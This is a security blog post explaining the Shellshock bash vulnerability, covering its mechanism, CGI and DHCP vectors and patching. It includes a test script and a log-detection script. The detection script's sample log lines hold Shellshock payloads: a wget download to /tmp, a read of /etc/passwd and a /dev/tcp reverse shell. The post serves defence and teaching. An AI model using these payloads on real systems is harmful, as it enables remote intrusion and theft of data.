By: Stuart Rorer, Senior Consultant and Penetration Tester at A-LIGN
It seems that with each passing day more vulnerabilities are disclosed, exposing gaping holes in the security of systems across the globe. Last week a security bulletin was released to the public describing a new threat that affects a wide range of systems worldwide.
The vulnerability was found in the bash shell (GNU Bash), a command line interpreter that is installed by default, and often used as the default shell, on most Unix, Linux, and Mac OS X systems. Branded “Shellshock” and tracked as CVE-2014-6271, the vulnerability has been given the highest possible CVSS base score of 10.0 in NIST's National Vulnerability Database.
The exploit works by placing a specially crafted string in an environment variable that a bash process later imports. Bash lets shell functions be exported to child processes through the environment: a variable whose value begins with “() {” is treated as a function definition and parsed when the child bash starts. Vulnerable versions did not stop parsing at the end of the function body, so any command appended after the closing brace was executed immediately, during startup, before the shell ran whatever it had actually been asked to run, and with no action required from the user. This is a form of command injection; injection flaws are currently rated number one in the OWASP Top Ten of the most common web application risks.
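The two halves of that mechanism, the legitimate function export and the parsing bug, can be seen side by side with the test string that circulated when the bug was disclosed. The script below is an added example written for this page, not A-LIGN's code; the function names demo_function_export and shellshock_status are my own, and the check assumes a bash binary is on the PATH.

```shell
#!/bin/sh
# Added example (not from the A-LIGN article). Shows how bash hands a
# function definition to a child process through the environment, which
# is the feature Shellshock abused, then runs the test string that was
# circulated at disclosure and reports whether the local bash is affected.

# 1. Legitimate use: export a function and call it from a child bash.
#    Bash serialises the definition into an environment variable whose
#    value begins with "() {"; the child recognises that prefix on startup
#    and re-parses it into a function.
demo_function_export() {
    bash -c '
        greet() { echo "hello from an exported function"; }
        export -f greet
        bash -c greet    # the child bash imports greet from its environment
    '
}

# 2. The CVE-2014-6271 check: a variable whose value is an empty function
#    definition followed by an extra command. A vulnerable bash keeps
#    parsing past the closing brace and runs "echo vulnerable" while it is
#    still importing the environment, before the -c script is even looked
#    at. A patched bash only prints "this is a test".
#    Returns 0 = patched, 1 = vulnerable, 2 = no bash found.
shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    # stderr is dropped: partially patched versions warn about the
    # "ignoring function definition attempt" but are not exploitable here.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable"; return 1 ;;
        *)            echo "patched";    return 0 ;;
    esac
}

demo_function_export
shellshock_status
```

The check is the same one-liner that was posted everywhere in the first days after disclosure; run it as the user whose bash you care about (the web server's account, for instance), because /bin/bash and a locally built bash in /usr/local/bin may differ.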
While there are many ways this security bug can be exploited, one of the most common is through web servers that run CGI scripts. A CGI server copies request data into environment variables before it runs the script (the User-Agent header becomes HTTP_USER_AGENT, the query string becomes QUERY_STRING, and so on), so a remote attacker who controls a header or a parameter controls an environment variable. If the script is itself a bash script, or calls bash through system() or a similar mechanism, a vulnerable bash imports that attacker-controlled variable on startup and runs the injected command with the web server's privileges. No authentication is required, which is why scanners began probing for /cgi-bin/ paths within hours of the disclosure.
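Because the attack string has to arrive in a request header or parameter, it is visible in the web server's access log. The script below is an added detection example for this page, not part of the original post: the log lines and IP addresses are constructed to look like Apache combined-format entries carrying the kind of User-Agent and Referer payloads that were seen in the wild, and the function names find_shellshock_probes, count_probes and probe_sources are my own.

```shell
#!/bin/sh
# Added example (not from the A-LIGN article): find Shellshock probes in
# web server access logs. The four log lines below are CONSTRUCTED for
# this example; three carry a "() {" payload in the Referer or User-Agent
# field, as a CGI script running under a vulnerable bash would receive it
# through HTTP_REFERER or HTTP_USER_AGENT. One line is benign traffic.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.9/x -O /tmp/x\""
198.51.100.77 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "() { :; }; /bin/cat /etc/passwd" "curl/7.37.0"
192.0.2.10 - - [25/Sep/2014:10:13:00 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 300 "-" "() { ignored; }; echo; /bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"'

# Reads combined-format log lines on stdin and prints "ip path" for every
# line that contains a function-definition prefix anywhere in the record.
# Bash only treats a value as an exported function when it starts with
# exactly "() {", but optional whitespace is allowed here so that the
# variants attackers send (e.g. "() { :; };") are all caught.
# Field 1 is the client IP and field 7 the request path in combined format.
find_shellshock_probes() {
    awk '/[(][)][[:space:]]*[{]/ { print $1, $7 }'
}

# Number of probing requests in the sample.
count_probes() {
    printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes | wc -l | tr -d ' '
}

# Distinct source addresses that sent probes, one per line, sorted.
probe_sources() {
    printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes | cut -d ' ' -f 1 | sort -u
}

echo "Probing requests:"
printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes
echo "Total: $(count_probes)"
echo "Sources:"
probe_sources
```

The same awk pattern works against a live log with `tail -f access_log | awk ...`, and a match on a path that is not under /cgi-bin/ is still worth looking at, since the payload only needs to reach a script that invokes bash, wherever it lives.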
Shellshock is not restricted to web servers. It also affects hardware with embedded versions of Linux, including many routers and other network appliances that ship bash. Another demonstrated vector is DHCP: on a Linux/Unix client whose DHCP client software runs its hook scripts under bash, a rogue DHCP server on the local network can deliver the attack string inside a DHCP option, which the hook script receives as an environment variable.
The bug is already being exploited on systems across the world. Its uses are vast and limited only by the creativity of the attacker: examples seen in the wild include installing backdoors, deleting files, and stealing sensitive information. Shellshock is definitely a threat you will want to prevent from being exploited.
If you think your system may be vulnerable, the best thing you can do is apply the latest bash patch. On Linux and Unix systems this can be done either by patching and rebuilding bash manually or, preferably, through your system's package manager; Mac OS X users should apply Apple's bash update. Note that the first upstream fix was incomplete (the remaining parsing issue was tracked separately as CVE-2014-7169), so install every bash update your vendor has issued and re-run the published test string afterwards to confirm the fix took effect. Where patching has to wait, reduce exposure in the meantime: disable or restrict CGI scripts that invoke bash, and block requests containing “() {” at the web application firewall or reverse proxy.
If you have additional questions about Shellshock or how A-LIGN can provide security assessment services for your organization, please call: 888-702-5446 or email us at firstname.lastname@example.org.
Vaughn-Nichols, S. (2014, September 26). Shellshock: How to protect your Unix, Linux and Mac servers | ZDNet. Retrieved September 26, 2014, from http://www.zdnet.com/shellshock-how-to-protect-your-unix-linux-and-mac-servers-7000034072/
Vulnerability Summary for CVE-2014-6271. (2014, September 24). Retrieved September 26, 2014, from http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271